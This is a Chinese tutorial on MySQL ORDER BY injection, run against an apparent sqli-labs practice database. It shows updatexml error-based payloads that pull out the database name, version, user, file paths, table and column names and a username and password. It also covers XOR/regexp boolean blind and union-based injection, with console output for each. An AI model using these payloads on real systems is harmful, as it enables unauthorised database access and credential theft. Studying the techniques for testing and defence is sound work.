mysql oder by 注入_Order by排序注入方法小总结
今天总结一下注入点在order by排序注入,学习一下记录下这个过程
声明:此文谨供学习记录研究使用,切勿用于非法用途,否则后果自负!
注入方法介绍
当页面出现mysql报错信息时,注入点在 order by后面,此时可以利用报错信息进行注入。
正常语句
mysql> select * from users order by id;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
13 rows in set (0.00 sec)
mysql> select * from users order by id desc;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 14 | admin4 | admin4 |
| 12 | dhakkan | dumbo |
| 11 | admin3 | admin3 |
| 10 | admin2 | admin2 |
| 9 | admin1 | admin1 |
| 8 | admin | admin |
| 7 | batman | mob!le |
| 6 | superman | genious |
| 5 | stupid | stupidity |
| 4 | secure | crappy |
| 3 | Dummy | p@ssword |
| 2 | Angelina | I-kill-you |
| 1 | Dumb | Dumb |
+----+----------+------------+
13 rows in set (0.00 sec)
mysql>
其中select * from users order by id desc;的desc是可控的传参值。
order by 与报错注入
下面进行报错注入
首先获取基本一些基本信息总结
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select database())),0));
ERROR 1105 (HY000): XPATH syntax error: '~security' //获取当前数据库
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select version())),0));
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53' //获取数据库版本
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost' //获取用户
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@datadir)),0));
ERROR 1105 (HY000): XPATH syntax error: '~E:\soft\phpmystudy\MySQL\data\' //获取数据库路径
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@version_compile_os)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Win32' //获取操作系统
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select @@basedir)),0));
ERROR 1105 (HY000): XPATH syntax error: '~E:/soft/phpmystudy/MySQL/' //mysql安装路径
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select session_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost' //获取连接数据库的用户名
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select current_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost' //获取当前用户名
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select system_user())),0));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost' //获取系统用户名
mysql>
图片.png
获取数据信息
获取数据库个数
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));
ERROR 1105 (HY000): XPATH syntax error: '~11'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(schema_name) from information_schema.schemata)),0));
ERROR 1105 (HY000): XPATH syntax error: '~11'
mysql>
注:count(*)是对结果函数统计,而count(schema_name)则是对不为空的行数结果进行统计
获取数据库列表信息
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~information_schema'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~challenges'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~dvwa'
mysql>
注: 这里使用limit逐条获取,为什么这样呢?因为我发现使用group_concat()批量查询输出结果长度有限制,因此需要这样一条一条获取了,当然数据多的时候就要简单写个python脚本跑了
获取某数据库表信息
获取表个数
payload:
and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema = "数据库名")),0))
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~4'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~4'
mysql>
获取表名
payload:
and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = "数据库名")),0))
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~emails,referers,uagents,users'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~emails'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~referers'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~uagents'
mysql>
获取某数据库中某个表字段信息
字段个数
payload:
and (updatexml(1,concat(0x7e,(select count(*) from information_schema.columns where table_schema = "数据库名" and table_name = "表名")),0))
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select count(*) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~3'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~3'
mysql>
获取字段名,字段多的需要单条获取
payload:
and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = "数据库名" and table_name = "表名")),0))
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~id,username,password'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~id'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~username'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = "security" and table_name = "users" limit 2,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~password'
mysql>
最后获取想要的信息就简单了
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select username,password from users limit 0,1)),0));
ERROR 1241 (21000): Operand should contain 1 column(s)
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select username from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select password from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'
mysql>
经测试,貌似只能指定获取一个字段信息
order by 与盲注
当页面没有展示MYSQL的错误信息时,且只能根据页面回显的状态进行判断时,可以使用布尔盲注
简单看两条语句
mysql> select * from users order by id ^(select(select version()) regexp '^aaaa');
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
13 rows in set (0.00 sec)
mysql> select * from users order by id ^(select(select version()) regexp '^5');
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 3 | Dummy | p@ssword |
| 2 | Angelina | I-kill-you |
| 5 | stupid | stupidity |
| 4 | secure | crappy |
| 7 | batman | mob!le |
| 6 | superman | genious |
| 9 | admin1 | admin1 |
| 8 | admin | admin |
| 11 | admin3 | admin3 |
| 10 | admin2 | admin2 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
13 rows in set (0.00 sec)
mysql>
图片.png
简单解释一下就是在regexp正则匹配的时候,如果匹配到数据返回1(00000001)的时候,此时的1会和id中的数据的二进制进行异或,按照异或的结果进行升序排列,所以显示的排列会发生变化;反之当进行正则匹配的时候,未匹配到数据返回0(00000000),此时数字和0异或的结果还是本身,所以显示的排列不会发生改变。
总结:当页面排序紊乱时则说明正则匹配到正确数据,页面排序未发生紊乱时则说明正则没有匹配到数据
通过以上可以判断数据库版本在5以上,这里的'^5'也可以转换成^5的十六进制。
order by 与 union 联合查询
当 $query = "select * from users order by id $input ";没有使用括号包裹的时候,是无法直接使用union查询的。
当 $query = "(select * from users order by id $input) ";使用括号进行包裹的时候,此时是可以进行union查询的。
获取版本号
mysql> (select * from users order by id ) union(select 1,(version()),3);
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
| 1 | 5.5.53 | 3 |
+----+----------+------------+
14 rows in set (0.00 sec)
mysql>
图片.png
其他就不一一截图了,查询语句格式如下:
(select * from users order by id ) union(select 1,(payload),3);
数据库信息payload:
database() //获取当前数据库
version() //获取数据库版本
user() //获取用户
@@datadir //获取数据库路径
@@version_compile_os //获取操作系统
@@basedir //mysql安装路径
session_user() //获取连接数据库的用户名
current_user() //获取当前用户名
system_user() //获取系统用户名
表信息payload: 同上,不再重复!
mysql oder by 注入_Order by排序注入方法小总结相关推荐
- mysql 手工sql注入_【sql注入专题02】Mysql手工注入流程
0x00 SQL注入的语句介绍 SQL注入的本质 sql注入的本质就是查询某个数据库下的某个表中的某些字段的内容,比如我们平时在数据库查询一条数据时操作. mysql> use security ...
- mysql占位符 防注入_PyMySQL防止SQL注入
一.SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库. 二.SQL注入攻击的总体 ...
- mysql注入转义绕过_SQL注入防御绕过——宽字节注入
01 背景知识 字符集 在了解宽字节注入之前,我们先来看一看字符集是什么.字符集也叫字符编码,是一种将符号转换为二进制数的映射关系. 几种常见的字符集: ASCII编码:单字节编码 latin1编码: ...
- 墨者学院mysql注入_【墨者学院】:SQL注入漏洞测试(delete注入)
0x00.题目描述: 背景介绍 最近有人匿名给工程师留言说,感谢他的辛勤付出,把墨者学院建设的这么好,不料激发了工程师对留言板的一波操作,轻松查到了这个人的身份. 实训目标 1.熟练掌握留言板的工作原 ...
- MySQL注入之高权限注入
MySQL注入之高权限注入 前言 二.高权限注入 1.什么是高权限注入 2.跨库查询思路 1.查看用户名 2.获取所有的数据库名 3.获取指定数据库名下的表名信息 4.获取指定damicms下的表名a ...
- tp3.2 mysql elt出错_ThinkPHP3.2.3 SQL注入漏洞分析
where注入 在控制器写如下demo开始测试public function ghtwf01(){ $data = M('users')->where('id='.I('id'))->fi ...
- mysql宽字节注入_(宽字节注入) 手注+sqlmap
进入题目后先简单尝试一下. 很明显的宽字节注入. 宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码. 手工注入 1.判断列数: http://chinalo ...
- sql注入中的联合注入
联合注入 联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库.至于为什么需要版本是5.0以上的MYSQL数据库, ...
- 【spring】依赖注入之@Autowired依赖注入
@Autowired依赖注入 本文源码基于spring-framework-5.3.10. 源码位置:org.springframework.beans.factory.annotation.Auto ...
最新文章
- 聚类和EM算法——K均值聚类
- 微服务海量日志怎么处理,推荐你试试这款工具....
- Docker(七):Docker build 、Docker Dockerfile 详解
- 001.android初级篇之ToolBar
- loadlibrary failed with error 126:找不到指定模块
- 解决windows版 duet display无法正常连接 【看完就会】
- 针对sqoop1.99.6 从jdbc向hdfs中抽取数据的几点感想
- word中取消自动目录超链接的方法
- p2p linux 开源项目,权威开源项目(linux系统、sip、live555)
- Oracle优化之SQL
- 求二叉树上结点的路径c语言版,求二叉树根到给定节点的路径设计报告.doc
- 哪个厂商搭载鸿蒙系统,神助攻!魅族官宣接入鸿蒙,导致概念股由绿翻红,3支直接涨停...
- Linux 命令(61)—— ldd 命令
- 笔记本电脑主板电池_深圳外星人笔记本电脑维修服务中心
- Mybatis-plus的两种分页插件的配置方式
- 朴素贝叶斯文本分类代码(详解)
- Weave 网络结构分析 - 每天5分钟玩转 Docker 容器技术(64)
- ALFA机器视觉深度学习外观缺陷检测系统软件机器视觉
- 2020 微信头像圣诞帽来啦,快给 TA 戴帽子吧~
- redis的压缩列表和跳表,看这一篇文章就够了